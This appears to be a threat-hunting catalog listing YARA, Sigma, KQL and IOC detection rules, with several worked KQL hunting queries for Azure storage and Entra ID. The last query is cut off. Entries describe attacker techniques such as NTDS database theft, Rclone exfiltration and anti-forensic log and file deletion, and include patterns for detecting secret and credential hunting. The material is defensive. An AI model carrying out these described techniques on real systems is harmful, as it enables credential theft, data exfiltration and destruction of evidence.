Miracl mirsys init

community
Miracl mirvar
yara low
Yara-Rules source

Miracl mirvar

community
Azure-Sentinel source
DeviceRegistryEvents

Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_oceanlotus_registry.yml. Questions via Twitter: @janvonkirchheim.

apthuntingmicrosoftofficial
Yara-Rules source

OpenSSL BN_mod_exp_inverse

community
Yara-Rules source

OpenSSL BN_mod_exp_mont

community
Yara-Rules source

OpenSSL BN_mod_exp_recp

community
Yara-Rules source

OpenSSL BN_mod_exp_simple

community
Yara-Rules source

OpenSSL BN_mod_exp2_mont

community
OpenSSL DSA
yara low
Yara-Rules source

YARA rule: OpenSSL_DSA

community
Yara-Rules source

YARA rule: pkcs8_private_key_information_syntax_standard

community
Azure-Sentinel source
DeviceProcessEvents

Prior to deploying Macaw ransomware in an organization, adversaries will use Attrib to display file attribute information on multiple drives and all subfolders.

huntinglateral-movementmicrosoftofficialransomware
Azure-Sentinel source
DeviceNetworkEvents

Qakbot operators have been abusing the Craigslist messaging system to send malicious emails. These emails contain non-clickable links to malicious domains impersonating Craigslist, which the user is i

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
DeviceFileEvents

Use this query to find email-stealing activities run by Qakbot that use "ping.exe -t 127.0.0.1" to obfuscate subsequent actions. Email theft that occurs might be exfiltrated to operators and indi

backdoorhuntingmicrosoftofficial
Qakbot email theft
kql medium
Azure-Sentinel source
DeviceFileEvents

Use this query to find email-stealing activities run by Qakbot that use "ping.exe -t 127.0.0.1" to obfuscate subsequent actions. Email theft that occurs might be exfiltrated to operators and indi

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

Use this query to find reconnaissance and beaconing activities after code injection occurs. Reconnaissance commands are consistent with the current version of Qakbot and occur automatically to exfiltr

backdoorcobalt-strikehuntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

Find use of Alternate Data Streams (ADS) for anti-forensic purposes, including execution from Alternate Data Streams.

huntingmicrosoftofficialransomware
Azure-Sentinel source
AlertEvidence

Adversaries are likely attempting to delete backup files in healthcare environments to eliminate recovery options

huntingmicrosoftofficialransomware
Azure-Sentinel source
DeviceProcessEvents

Look for cipher.exe deleting data from multiple drives. This is often performed as an anti-forensic measure prior to encryption.

huntingmicrosoftofficialransomware
Azure-Sentinel source
DeviceProcessEvents

Look for attempts to use fsutil.exe to delete file system logs that can be used as forensic artifacts.

huntingmicrosoftofficialransomware
Azure-Sentinel source
AlertEvidenceDeviceLogonEvents

Identify accounts that have logged on to affected endpoints. Check for specific alerts.

huntingmicrosoftofficialransomware
Azure-Sentinel source
DeviceProcessEvents

Find distinct evasion and execution activities associated with the Robbinhood ransomware campaign.

evasionhuntingmicrosoftofficialransomware
Azure-Sentinel source
DeviceProcessEvents

Find attempts to stop System Restore and prevent the system from creating restore points.

huntingmicrosoftofficialransomware
Azure-Sentinel source
DeviceFileEvents

Locate vulnerable Gigabyte drivers used by RobbinHood ransomware to turn off security tools.

huntingmicrosoftofficialransomware
RijnDael AES
yara low
Yara-Rules source

RijnDael AES

community
Yara-Rules source

RijnDael AES (check2) [char]

community
Yara-Rules source

RijnDael AES S-inv [char]

community
Yara-Rules source

RsaEuro NN_modInv

community
Yara-Rules source

RsaEuro NN_modMult

community
Yara-Rules source

RsaRef2 NN_modExp

community
Yara-Rules source

RsaRef2 NN_modInv

community
Yara-Rules source

RsaRef2 NN_modMult

community
Yara-Rules source

RsaRef2 RsaPrivateDecrypt

community
Yara-Rules source

RsaRef2 RsaPrivateEncrypt

community
Yara-Rules source

RsaRef2 RsaPublicDecrypt

community
Yara-Rules source

RsaRef2 RsaPublicEncrypt

community
Azure-Sentinel source
T1566
DeviceNetworkEvents

This query identifies matches based on domain IOCs related to Star Blizzard against Microsoft Defender for Endpoint device network connections

huntingmicrosoftofficial
StrRAT-AV-Discovery
kql medium
Azure-Sentinel source
DeviceProcessEvents

StrRAT is a Java-based remote access tool which steals browser credentials, logs keystrokes and takes remote control of infected systems. It also has a module to download additional payloads onto the

backdoorcredential-thefthuntingmicrosoftofficialransomware
Azure-Sentinel source
EmailUrlInfo

StrRAT is a Java-based remote access tool which steals browser credentials, logs keystrokes and takes remote control of infected systems. It also has a module to download additional payloads onto the

backdoorcredential-thefthuntingmicrosoftofficialransomware
Azure-Sentinel source
DeviceProcessEvents

StrRAT is a Java-based remote access tool which steals browser credentials, logs keystrokes and takes remote control of infected systems. It also has a module to download additional payloads onto the

backdoorcredential-thefthuntingmicrosoftofficialpersistenceransomware
Azure-Sentinel source
DeviceNetworkEvents

Jupyter, otherwise known as SolarMarker, is a malware family and cluster of components known for its info-stealing and backdoor capabilities that mainly proliferates through search engine optimization

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

Microsoft has observed attackers who have gained entry to an environment via the Log4J vulnerability utilizing identifiable strings in PowerShell commands.

exploithuntingmicrosoftofficialpowershell
Azure-Sentinel source
DeviceProcessEvents

Attackers may use unconventional PowerShell curl flags

exploithuntingmicrosoftofficialpowershell
Azure-Sentinel source
DeviceProcessEvents

Microsoft has observed attackers who have gained entry to an environment via the Log4J vulnerability utilizing the ws_TomcatService.exe process to launch malicious processes.

exploithuntingmicrosoftofficial
ThreatFox source
DnsEvents

Hunt package for 95 IOCs associated with ClearFake

iocjs-clearfakethreatfox
ThreatFox: KongTuke IOCs
ioc-hunt high
ThreatFox source
DeviceFileEventsUrlClickEvents

Hunt package for 3 IOCs associated with KongTuke

iocjs-kongtukethreatfox
ThreatFox source
CommonSecurityLogDeviceFileEventsDeviceNetworkEventsDnsEventsUrlClickEvents

Hunt package for 8 IOCs associated with SmartApeSG

iocjs-smartapesgthreatfox
ThreatFox source
DnsEventsUrlClickEvents

Hunt package for 100 IOCs associated with Unknown malware

iocthreatfoxunknown
ThreatFox source
CommonSecurityLogDeviceNetworkEventsUrlClickEvents

Hunt package for 5 IOCs associated with Unknown RAT

backdooriocthreatfoxunknown_rat
ThreatFox: Amadey IOCs
ioc-hunt high
ThreatFox source
UrlClickEvents

Hunt package for 3 IOCs associated with Amadey

iocthreatfoxwin-amadey
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 6 IOCs associated with Cobalt Strike

cobalt-strikeiocthreatfoxwin-cobalt_strike
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 2 IOCs associated with Lumma Stealer

infostealeriocthreatfoxwin-lumma
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 5 IOCs associated with Nanocore RAT

backdooriocthreatfoxwin-nanocore
ThreatFox: Remcos IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 9 IOCs associated with Remcos

iocthreatfoxwin-remcos
ThreatFox: Stealc IOCs
ioc-hunt high
ThreatFox source
UrlClickEvents

The Stealc malware is a data exfiltration tool designed to steal sensitive information such as credentials and system data from infected hosts. It typically arrives via phishing emails or malicious websites containing malicious URLs that download and execute the payload. SOC analysts should monitor for unusual outbound traffic patterns, unexpected data transfers, and signs of lateral movement or command-and-control communication beyond the identified URLs.

iocthreatfoxwin-stealc
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 2 IOCs associated with ValleyRAT

backdooriocthreatfoxwin-valley_rat
ThreatFox: Vidar IOCs
ioc-hunt high
ThreatFox source
DnsEventsUrlClickEvents

Hunt package for 4 IOCs associated with Vidar

iocthreatfoxwin-vidar
Yara-Rules source

Look for Random function

community
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 17 malicious URLs tagged as 32-bit

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 8 malicious URLs tagged as arm

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 51 malicious URLs tagged as ClearFake

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 18 malicious URLs tagged as elf

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 3 malicious URLs tagged as malware_download

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 4 malicious URLs tagged as mirai

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 2 malicious URLs tagged as Mozi

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 12 malicious URLs tagged as ua-wget

iocurlhaus
Azure-Sentinel source
DeviceProcessEvents

Prior to deploying Macaw ransomware in an organization, the adversary frequently uses MSBuild.exe as a LOLBin to communicate with the C2.

huntingmicrosoftofficialransomware
Yara-Rules source

Look for Random function

community
Yara-Rules source

Look for Random function

community
Yara-Rules source

YARA rule: x509_public_key_infrastructure_cert

community
SigmaHQ source
T1202
imProcessCreate

Detects the use of SFTP.exe to execute commands indirectly via ProxyCommand parameter. Threat actors were seen leveraging this legitimate Windows binary to bypass security controls and execute arbitra

evasion
Azure-Sentinel source
DeviceFileEventsDeviceImageLoadEventsDeviceProcessEvents

This query will hunt for files matching the current abuse.ch recent threat feed based on SHA256. Currently the query is set up to analyze the last day's worth of events, but this is configurable using t

huntingmicrosoftofficial
Azure-Sentinel source
DeviceFileEventsDeviceImageLoadEventsDeviceProcessEvents

This query will hunt for files matching the current abuse.ch recent threat feed based on SHA256. Currently the query is set up to analyze the last day's worth of events, but this is configurable using t

huntingmicrosoftofficial
Azure-Sentinel source
DeviceFileEvents

Sample query that searches for .settingcontent-ms files that have been downloaded from the web through Microsoft Edge, Internet Explorer, Google Chrome, Mozilla Firefox or Microsoft Outlook. For questions @Mila

huntingmicrosoftofficial
APT Baby Shark
kql medium
Azure-Sentinel source
DeviceProcessEvents

Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_babyshark.yml. Questions via Twitter: @janvonkirchheim.

apthuntingmicrosoftofficial
APT29 thinktanks
kql medium
Azure-Sentinel source
DeviceProcessEvents

Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_apt29_thinktanks.yml. Questions via Twitter: @janvonkirchheim.

apthuntingmicrosoftofficial
Bazacall Emails
kql medium
Azure-Sentinel source
EmailEvents

Bazacall malware uses emails that contain a phone number for the user to call in order to cancel a fake subscription. These emails contain no links or attachments, and use automatic payment lures to t

huntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_bear_activity_gtr19.yml. Questions via Twitter: @janvonkirchheim.

apthuntingmicrosoftofficial
Cloud Hopper
kql medium
Azure-Sentinel source
DeviceProcessEvents

Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_cloudhopper.yml. Questions via Twitter: @janvonkirchheim.

apthuntingmicrosoftofficial
Azure-Sentinel source
AlertEvidence

Microsoft has observed Bazacall using Cobalt Strike in order to move laterally to other machines on the network.

cobalt-strikehuntinglateral-movementmicrosoftofficial
DES [long]
yara low
Yara-Rules source

DES [long]

community
Yara-Rules source

DES [pbox] [long]

community
DES [sbox]
yara low
Yara-Rules source

DES [sbox]

community
Azure-Sentinel source
DeviceNetworkEvents

This is a query to retrieve last 30 days network connections to known Dofoil NameCoin servers. The full article is available here: https://cloudblogs.microsoft.com/microsoftsecure/2018/04/04/hunting-d

huntingmicrosoftofficial
Azure-Sentinel source
DeviceFileEvents

BazaCall is a campaign that manipulates users into calling a customer support center, where they are instructed to download an Excel file to unsubscribe from a phony service. When the user opens the Ex

huntingmicrosoftofficial
Azure-Sentinel source
DeviceNetworkEvents

BazaCall is a campaign that manipulates users into calling a customer support center, where they are instructed to download an Excel file to unsubscribe from a phony service. When the user opens the Ex

huntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

Bazacall uses malicious macro-enabled Excel documents to execute their payload.

huntingmicrosoftofficial
Yara-Rules source

FGint Base256StringToGInt

community
Yara-Rules source

FGint ConvertBase256StringToHexString

community
Yara-Rules source

FGint ConvertBase256to64

community
Yara-Rules source

FGint ConvertHexStringToBase256String

community
Yara-Rules source

FGint DSAPrimeSearch

community
FGint DSASign
yara low
Yara-Rules source

FGint DSASign

community
FGint DSAVerify
yara low
Yara-Rules source

FGint DSAVerify

community
Yara-Rules source

FGint ECAddPoints

community
Yara-Rules source

FGint ECElGamalEncrypt

community
Yara-Rules source

FGint ECPointDestroy

community
Yara-Rules source

FGint ECPointKMultiple

community
Yara-Rules source

FGint FGIntToBase256String

community
Yara-Rules source

FGint FindPrimeGoodCurveAndPoint

community
Yara-Rules source

FGint PGPConvertBase256to64

community
FGint RsaDecrypt
yara low
Yara-Rules source

FGint RsaDecrypt

community
FGint RSAEncrypt
yara low
Yara-Rules source

FGint RSAEncrypt

community
FGint RSAVerify
yara low
Yara-Rules source

FGint RSAVerify

community
Azure-Sentinel source
DeviceFileEvents

Bazacall uses malicious Excel files to execute payloads on affected devices.

huntingmicrosoftofficial
NTDS theft
kql medium
Azure-Sentinel source
DeviceProcessEvents

Microsoft has observed compromises related to Bazacall resulting in theft of the Active Directory database using ntdsutil.exe.

huntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

Microsoft has observed Bazacall using a renamed version of Rclone for data exfiltration.

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
DeviceNetworkEvents

During the chain of events from Bazacall to Bazaloader, RunDLL makes several network connections, including to command and control (C2) infrastructure. The command line for these connections contains

huntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

The "Stolen Images" Bazarloader campaign uses fake copyright infingement contact form emails and malicious files pretending to contain "stolen images" to trick users into downloading the malware.

huntingmicrosoftofficial
ThreatFox source
DnsEvents

Hunt package for 103 IOCs associated with ClearFake

iocjs-clearfakethreatfox
ThreatFox: KongTuke IOCs
ioc-hunt high
ThreatFox source
DnsEventsUrlClickEvents

Hunt package for 7 IOCs associated with KongTuke

iocjs-kongtukethreatfox
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEventsUrlClickEvents

Hunt package for 6 IOCs associated with Unknown malware

iocthreatfoxunknown
ThreatFox source
UrlClickEvents

Hunt package for 2 IOCs associated with Lumma Stealer

infostealeriocthreatfoxwin-lumma
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 6 IOCs associated with Nanocore RAT

backdooriocthreatfoxwin-nanocore
ThreatFox source
DnsEvents

Quasar RAT is

backdooriocthreatfoxwin-quasar_rat
ThreatFox source
DnsEvents

StrelaStealer is a credential-stealing malware that exfiltrates sensitive data, including passwords and browser cookies, by establishing covert communication with command-and-control servers. It typically arrives via phishing emails containing malicious links or compromised websites that deploy the malware through exploit kits or malicious attachments. SOC analysts should monitor for lateral movement indicators, unusual outbound traffic patterns

infostealeriocthreatfoxwin-strelastealer
ThreatFox: Vidar IOCs
ioc-hunt high
ThreatFox source
DnsEventsUrlClickEvents

Hunt package for 16 IOCs associated with Vidar

iocthreatfoxwin-vidar
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 47 malicious URLs tagged as 32-bit

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

ClearFake is a malware family that primarily functions as a data exfiltration tool, leveraging command-and-control (C2) communication to

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 3 malicious URLs tagged as malware_download

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

The Mozi malware family is a downloader that establishes command-and-control (C2) communication to exfiltrate data and deploy additional payloads. It typically arrives via phishing emails or malicious websites leveraging

iocurlhaus
Azure-Sentinel source
DeviceImageLoadEvents

In the campaign where Bazarloader is delivered via emails containing password-protected zip attachments, regsvr32.exe is used to launch a malicious payload that is disguised as a JPG file.

huntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

The password-protected zip attachment -> Word doc delivery method of Bazarloader utilizes Word to create an .hta file and launch it via MSHTA to connect to a malicious domain and pull down the Bazarloader p

huntingmicrosoftofficial
Azure-Sentinel source
DeviceEvents

This query offers daily categorization of ASR rules, helping SOC analysts monitor specific categories like office-related activities or WMI among the 16 rules. It aids in tracking detection rates and

backdoorhuntingmicrosoftofficialwmi
Azure-Sentinel source
T1567

Under specific circumstances, executing KQL queries can exfiltrate information like access tokens, regarding external data functions like adx(). This query tries to list executed KQL queries that use

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
T1530T1213T1020

This hunting query looks for increases in the number of workspaces queried by a user.

huntingmicrosoftofficial
Yara-Rules source

CryptoPP a_exp_b_mod_c

community
CryptoPP modulo
yara low
Yara-Rules source

CryptoPP modulo

community
Yara-Rules source

FGint Base10StringToGInt

community
Yara-Rules source

FGint FGIntDivMod

community
Yara-Rules source

FGint FGIntDestroy

community
Yara-Rules source

FGint FGIntModExp

community
Yara-Rules source

FGint MontgomeryModExp

community
FGint MulByInt
yara low
Yara-Rules source

FGint MulByInt

community
Azure-Sentinel source
T1485

This hunting query identifies GitHub activities where it is the first time a user has deleted a repo, which may be a sign of compromise.

huntingmicrosoftofficial
Azure-Sentinel source
T1136

This hunting query identifies accounts that are new or inactive and have accessed or used GitHub, which may be a sign of compromise.

huntingmicrosoftofficial
Azure-Sentinel source
T1485

This hunting query identifies GitHub activities where there are a large number of deletions, which may be a sign of compromise.

huntingmicrosoftofficial
Azure-Sentinel source
T1505T1562

This hunting query identifies GitHub OAuth Apps that have restrictions disabled, which may be a sign of compromise. Attackers will want to disable such security tools in order to go undetected.

huntingmicrosoftofficial
Azure-Sentinel source
T1213

Attackers can exfiltrate data from your GitHub repository by cloning it. This hunting query tracks clone activities for each repository, allowing quick identification of anomalies/excessive clones to

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
T1213

Adversaries may exploit GitHub's public access to exfiltrate sensitive data or distribute malicious code by converting private repositories to public, leveraging the platform's visibility for covert operations. SOC teams should proactively

huntingmicrosoftofficial
Azure-Sentinel source
T1098T1562

This hunting query identifies GitHub activities where permissions are updated, which may be a sign of compromise.

huntingmicrosoftofficial
Azure-Sentinel source
T1098T1078

This hunting query identifies accounts in GitHub that have granted access to another account which then grants access to yet another account, which may be a sign of compromise.

huntingmicrosoftofficial
Yara-Rules source

Looks for MD5 API

community
Yara-Rules source

Look for MD5 constants

community
Miracl crt
yara low
Yara-Rules source

Miracl crt

community
Miracl powmod
yara low
Yara-Rules source

Miracl powmod

community
Azure-Sentinel source
T1030

This hunting query looks for users who are running multiple queries that return either a very large amount of data or the maximum amount allowed by the query method.

huntingmicrosoftofficial
Azure-Sentinel source
T1530T1213T1020

This hunting query looks for clients running queries that have not previously been seen running queries.

huntingmicrosoftofficial
Azure-Sentinel source
T1530T1213T1020

This hunting query looks for new Service Principals running queries that have not previously been seen running queries.

huntingmicrosoftofficial
Azure-Sentinel source
T1530T1213

This hunting query looks for users who have run queries calling a watchlist template relating to sensitive data that have not previously been seen calling these watchlists.

huntingmicrosoftofficial
Azure-Sentinel source
T1530T1213

This hunting query looks for users who have run queries that have not previously been seen running queries.

huntingmicrosoftofficial
Azure-Sentinel source
T1030

This hunting query looks for anomalously large Log Analytics (LA) queries by users.

huntingmicrosoftofficial
Azure-Sentinel source
T1530T1213
AuditLogsSecurityEventSigninLogs

This hunting query looks for queries that appear to be looking for secrets or passwords in tables.

huntingmicrosoftofficial
Yara-Rules source

The RC6_Constants rule detects binaries containing RC6 encryption constants, which may indicate malicious activity leveraging the RC6 cipher.

community
Yara-Rules source

Look for RIPEMD-160 constants

community
Yara-Rules source

Look for SHA1 constants

community
Yara-Rules source

Look for SHA2/BLAKE2/Argon2 IVs

community
Yara-Rules source

Look for SHA384/SHA512 constants

community
Yara-Rules source

Look for TEA Encryption

community
ThreatFox: Kimwolf IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 3 IOCs associated with Kimwolf

apk-kimwolfiocthreatfox
ThreatFox: Mirai IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

The Mirai malware family compromises IoT devices by exploiting default credentials and weak security configurations, turning them into bots for large-scale DDoS attacks. It typically arrives via network exploitation, leveraging un

elf-miraiiocthreatfox
ThreatFox source
DnsEvents

Hunt package for 77 IOCs associated with ClearFake

iocjs-clearfakethreatfox
ThreatFox source
DnsEvents

Hunt package for 2 IOCs associated with FAKEUPDATES

iocjs-fakeupdatesthreatfox
ThreatFox: KongTuke IOCs
ioc-hunt high
ThreatFox source
DeviceFileEventsDnsEvents

The KongTuke malware is a data exfiltration tool that establishes

iocjs-kongtukethreatfox
ThreatFox source
CommonSecurityLogDeviceFileEventsDeviceNetworkEventsDnsEventsUrlClickEvents

Hunt package for 36 IOCs associated with Unknown malware

iocthreatfoxunknown
ThreatFox: Havoc IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceFileEventsDeviceNetworkEventsDnsEvents

The Havoc malware family is designed for data exfiltration and persistence, often leveraging encrypted communication channels to steal sensitive

iocthreatfoxwin-havoc
ThreatFox source
DnsEvents

Hunt package for 20 IOCs associated with Lumma Stealer

infostealeriocthreatfoxwin-lumma
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 7 IOCs associated with Quasar RAT

backdooriocthreatfoxwin-quasar_rat
ThreatFox source
DnsEvents

StrelaStealer is a credential-stealing malware that exfiltrates sensitive data such as usernames,

infostealeriocthreatfoxwin-strelastealer
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 3 IOCs associated with ValleyRAT

backdooriocthreatfoxwin-valley_rat
ThreatFox: Vidar IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEventsUrlClickEvents

Vidar is a data exfiltration malware

iocthreatfoxwin-vidar
URLhaus source
CommonSecurityLogDnsEvents

The "32-bit" malware

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 38 malicious URLs tagged as ClearFake

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 3 malicious URLs tagged as malware_download

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 9 malicious URLs tagged as Mozi

iocurlhaus
Azure-Sentinel source
T1030

This hunting query looks for users whose total returned data is significantly above their average.

huntingmicrosoftofficial
Azure-Sentinel source
T1020

This hunting query looks for users who have multiple failed queries in a short space of time.

huntingmicrosoftofficial
Yara-Rules source

Look for WhirlPool constants

community
Azure-Sentinel source
T1001.002
CommonSecurityLog

Threat actors can use JPEG files to hide malware, or other malicious code from inspection. This query looks for the downloading of abnormally large JPEG files from a source where large JPEG files hav

exploithuntingmicrosoftofficial
Yara-Rules source

Looks for advapi API functions

community
Azure-Sentinel source
T1059
AzureActivity

'This query looks for users starting an Azure CloudShell session and summarizes the Azure Activity from that user account during that timeframe (by default 1 hour). This can be used to help identify ab

huntingmicrosoftofficial
Azure-Sentinel source
T1537

'This hunting query will identify where a file is uploaded to Azure File or Blob storage and is then accessed once before being deleted. This activity may be indicative of exfiltration activity.'

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
T1020, T1537

'This hunting query will try to identify instances where a file is uploaded to file storage and then deleted within a given threshold. By default the query will find instances where a file is uploaded

backdoorhuntingmicrosoftofficial
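The two storage entries above (upload, single access, delete; and upload then delete within a threshold) share one hunt shape. The KQL below is an added example of it, not the catalog's query. It assumes blob diagnostics are flowing into StorageBlobLogs and uses that table's standard columns (OperationName, Uri, CallerIpAddress, AuthenticationType, StatusCode); the 2-hour lifetime is an arbitrary starting threshold.

```kql
// Added example: blob uploaded, read exactly once, then deleted within maxLifetime.
// Dropping the 'reads' join gives the simpler "uploaded then deleted" variant.
let lookback = 7d;
let maxLifetime = 2h;                       // upload-to-delete window that counts as suspicious
let events = StorageBlobLogs
| where TimeGenerated > ago(lookback)
| where StatusCode < 400                    // successful operations only
| extend BlobPath = tostring(split(Uri, "?")[0]);   // strip SAS token / query string
let uploads = events
| where OperationName == "PutBlob"
| project BlobPath, UploadTime = TimeGenerated, UploadIP = CallerIpAddress, UploadAuth = AuthenticationType;
let reads = events
| where OperationName == "GetBlob"
| project BlobPath, ReadTime = TimeGenerated, ReadIP = CallerIpAddress;
let deletes = events
| where OperationName == "DeleteBlob"
| project BlobPath, DeleteTime = TimeGenerated, DeleteIP = CallerIpAddress;
uploads
| join kind=inner deletes on BlobPath
| where DeleteTime > UploadTime and DeleteTime - UploadTime <= maxLifetime
| join kind=inner reads on BlobPath
| where ReadTime between (UploadTime .. DeleteTime)
| summarize ReadCount = count(), ReadIPs = make_set(ReadIP), ReadTime = min(ReadTime)
    by BlobPath, UploadTime, UploadIP, UploadAuth, DeleteTime, DeleteIP
| where ReadCount == 1                      // staged, collected once, then cleaned up
| extend Lifetime = DeleteTime - UploadTime
| project UploadTime, ReadTime, DeleteTime, Lifetime, BlobPath, UploadIP, ReadIPs, DeleteIP, UploadAuth
| order by UploadTime desc
```

The query string is stripped from the Uri because SAS tokens differ per request and would otherwise break the join on blob path. A read IP that differs from the upload IP, or a SAS/anonymous read of an OAuth-uploaded blob, is the combination worth triaging first.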
Azure-Sentinel source
T1570

'Looks for file upload actions to Azure File and Blob Storage from known VPS provider network ranges. This is not an exhaustive list of VPS provider ranges but covers some of the most prevalent provi

huntingmicrosoftofficial
Azure-Sentinel source
T1485

'Detect mass file deletion events within Azure File and Blob storage. deleteWindow controls the period of time the deletions must occur in, whilst the deleteThreshold controls how many files must be d

huntingmicrosoftofficial
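The mass-deletion entry above names two knobs, deleteWindow and deleteThreshold. The KQL below is an added example with the same two parameters, not the catalog's query; it uses StorageBlobLogs standard columns and the starting values (10 minutes, 50 blobs) are arbitrary.

```kql
// Added example: burst of blob deletions by one caller inside a fixed window.
let deleteWindow = 10m;    // deletions must fall inside a window of this length
let deleteThreshold = 50;  // and at least this many distinct blobs must be deleted in it
let lookback = 1d;
StorageBlobLogs
| where TimeGenerated > ago(lookback)
| where OperationName == "DeleteBlob" and StatusCode < 400
| extend BlobPath = tostring(split(Uri, "?")[0])
| summarize DeletedBlobs = dcount(BlobPath), Deletions = count(),
            SampleBlobs = make_set(BlobPath, 10),
            FirstDelete = min(TimeGenerated), LastDelete = max(TimeGenerated)
    by AccountName, CallerIpAddress, AuthenticationType, WindowStart = bin(TimeGenerated, deleteWindow)
| where DeletedBlobs >= deleteThreshold
| order by DeletedBlobs desc
```

bin() gives fixed, non-overlapping windows, so a burst that straddles a boundary can be split below the threshold; halving deleteWindow and doubling the lookback bins, or grouping with a sliding row_window_session() on a serialised sort, closes that gap. Lifecycle-management and backup service principals will show up here and belong in an allow-list keyed on AuthenticationType and caller IP rather than on account name.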
Yara-Rules source

Looks for big numbers 20:sized

community
Yara-Rules source

Detects 32-bit numeric values that may indicate obfuscation

community
Yara-Rules source

Looks for big numbers 48:sized

community
Yara-Rules source

Looks for big numbers 64:sized

community
Yara-Rules source

Looks for big numbers 128:sized

community
Yara-Rules source

Looks for big numbers 256:sized

community
Yara-Rules source

Look for Blowfish constants

community
Azure-Sentinel source
AzureDiagnostics

'Discover all critical ports from a list that have rules with 'Any' as the source IP, which means they are open to everyone. Critical ports should not be open to everyone and should be filtered.'

huntingmicrosoftofficial
Azure-Sentinel source
T1136
AuditLogs

'This query looks at the last 14 days for "Consent to application" operation by a user/app which could potentially mean unauthorized access. Additional context is added from AuditLogs based on Corrlea

backdoorhuntingmicrosoftofficial
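The consent-to-application entry above enriches each consent with the other audit operations that share its CorrelationId. The KQL below is an added example of that enrichment, not the catalog's query. It assumes the usual Entra ID AuditLogs schema (InitiatedBy.user.*, TargetResources[0].displayName, Result).

```kql
// Added example: application consents from the last 14 days, with every other
// audit operation that shares the consent's CorrelationId (service principal
// creation, app role assignment, delegated permission grant, ...).
let lookback = 14d;
let consents = AuditLogs
| where TimeGenerated > ago(lookback)
| where OperationName == "Consent to application"
| extend InitiatingUser = tostring(InitiatedBy.user.userPrincipalName),
         InitiatingApp  = tostring(InitiatedBy.app.displayName),
         InitiatingIP   = tostring(InitiatedBy.user.ipAddress),
         AppName        = tostring(TargetResources[0].displayName)
| project ConsentTime = TimeGenerated, CorrelationId, Result,
          InitiatingUser, InitiatingApp, InitiatingIP, AppName;
consents
| join kind=leftouter (
    AuditLogs
    | where TimeGenerated > ago(lookback)
    | where OperationName != "Consent to application"
    | project CorrelationId, RelatedOp = OperationName, RelatedTime = TimeGenerated
  ) on CorrelationId
| summarize RelatedOps = make_set(RelatedOp),
            RelatedCount = countif(isnotempty(RelatedOp)),
            RelatedSpan = max(RelatedTime) - min(RelatedTime)
    by ConsentTime, CorrelationId, Result, InitiatingUser, InitiatingApp, InitiatingIP, AppName
| order by ConsentTime desc
```

A leftouter join keeps consents that have no correlated operations; the RelatedOps set is what distinguishes a user accepting a tenant-wide pre-approved app from a first-time consent that also created a service principal and granted it delegated permissions. Pivot on InitiatingIP and AppName to find the same application being consented to from one source across many users.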
Yara-Rules source

Look for CRC16 table

community
Yara-Rules source

Look for CRC32 [poly]

community
Yara-Rules source

Look for CRC32 table

community
Yara-Rules source

CRC32 table lookup

community
Yara-Rules source

Look for CRC32b [poly]

community
Yara-Rules source

Look for CRC32c (Castagnoli) [poly]

community
Yara-Rules source

Looks for crypt32 CryptBinaryToStringA function

community
Azure-Sentinel source
T1595, T1530

"This Kusto (KQL) hunting query detects blob-enumeration or file-spraying behaviour in Azure Storage by: - Aggregating requests into time-bound sessions with row_window_session(). - Defining a "us

backdoorhuntingmicrosoftofficial
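The blob-enumeration entry above builds time-bound sessions with row_window_session(). The KQL below is an added example of that technique, not the catalog's query. It uses StorageBlobLogs standard columns; the session bounds and request thresholds are arbitrary starting points to tune per storage account.

```kql
// Added example: group read/list requests per caller IP into sessions, then flag
// sessions that look like enumeration (many requests) or name spraying (many 404s).
let maxSession = 1h;     // a session can last at most this long ...
let maxGap = 5m;         // ... and ends after this much idle time
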